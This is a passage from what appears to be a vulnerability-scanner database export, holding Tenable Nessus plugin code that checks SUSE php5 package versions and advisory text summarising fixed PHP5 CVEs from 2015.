rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debugsource-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-devel-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pear-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-debuginfo-5.6.1-36.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-25T17:19:33", "description": "This update of PHP5 brings several security fixes.\n\nSecurity fixes :\n\n - CVE-2015-6831: A use after free vulnerability in unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#942291] [bnc#942294] [bnc#942295]\n\n - CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject items could be used to crash php or potentially execute code. [bnc#942293]\n\n - CVE-2015-6833: A directory traversal when extracting ZIP files could be used to overwrite files outside of intended area. [bnc#942296]\n\n - CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#945403]\n\n - CVE-2015-6835: A Use After Free Vulnerability in session unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#945402]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type confusion leading to remote code execution problem was fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nBugfixes :\n\n - Compare with SQL_NULL_DATA correctly [bnc#935074]\n\n - If MD5 was disabled in net-snmp we have to disable the used MD5 function in ext/snmp/snmp.c as well.\n (bsc#944302)\n\nAlso the Suhosin framework was updated to 0.9.38. [fate#319325]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : php5 (SUSE-SU-2015:1633-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-05-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5", "p-cpe:/a:novell:suse_linux:php5-bcmath", "p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php5-bz2", "p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php5-calendar", "p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ctype", "p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php5-curl", "p-cpe:/a:novell:suse_linux:php5-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-dba", "p-cpe:/a:novell:suse_linux:php5-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debugsource", "p-cpe:/a:novell:suse_linux:php5-dom", "p-cpe:/a:novell:suse_linux:php5-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php5-enchant", "p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php5-exif", "p-cpe:/a:novell:suse_linux:php5-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fastcgi", "p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fpm", "p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ftp", "p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gd", "p-cpe:/a:novell:suse_linux:php5-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gettext", "p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gmp", "p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-iconv", "p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php5-intl", "p-cpe:/a:novell:suse_linux:php5-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-json", "p-cpe:/a:novell:suse_linux:php5-json-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ldap", "p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mbstring", "p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mcrypt", "p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mysql", "p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-odbc", "p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-opcache", "p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo", "p-cpe:/a:novell:suse_linux:php5-openssl", "p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pcntl", "p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pdo", "p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pgsql", "p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-posix", "p-cpe:/a:novell:suse_linux:php5-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pspell", "p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo", "p-cpe:/a:novell:suse_linux:php5-shmop", "p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php5-snmp", "p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-soap", "p-cpe:/a:novell:suse_linux:php5-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sockets", "p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sqlite", "p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php5-suhosin", "p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvsem", "p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvshm", "p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-tokenizer", "p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php5-wddx", "p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlreader", "p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xsl", "p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zip", "p-cpe:/a:novell:suse_linux:php5-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zlib", "p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2015-1633-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119971", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1633-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119971);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : php5 (SUSE-SU-2015:1633-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of PHP5 brings several security fixes.\n\nSecurity fixes :\n\n - CVE-2015-6831: A use after free vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#942291]\n [bnc#942294] [bnc#942295]\n\n - CVE-2015-6832: A dangling pointer in the unserialization\n of ArrayObject items could be used to crash php or\n potentially execute code. [bnc#942293]\n\n - CVE-2015-6833: A directory traversal when extracting ZIP\n files could be used to overwrite files outside of\n intended area. [bnc#942296]\n\n - CVE-2015-6834: A Use After Free Vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#945403]\n\n - CVE-2015-6835: A Use After Free Vulnerability in session\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#945402]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type\n confusion leading to remote code execution problem was\n fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer\n dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nBugfixes :\n\n - Compare with SQL_NULL_DATA correctly [bnc#935074]\n\n - If MD5 was disabled in net-snmp we have to disable the\n used MD5 function in ext/snmp/snmp.c as well.\n (bsc#944302)\n\nAlso the Suhosin framework was updated to 0.9.38. [fate#319325]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=935074\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942291\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942294\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942296\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=944302\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=945402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=945403\");\n script_set_attribute(attribute:\"see_also\", 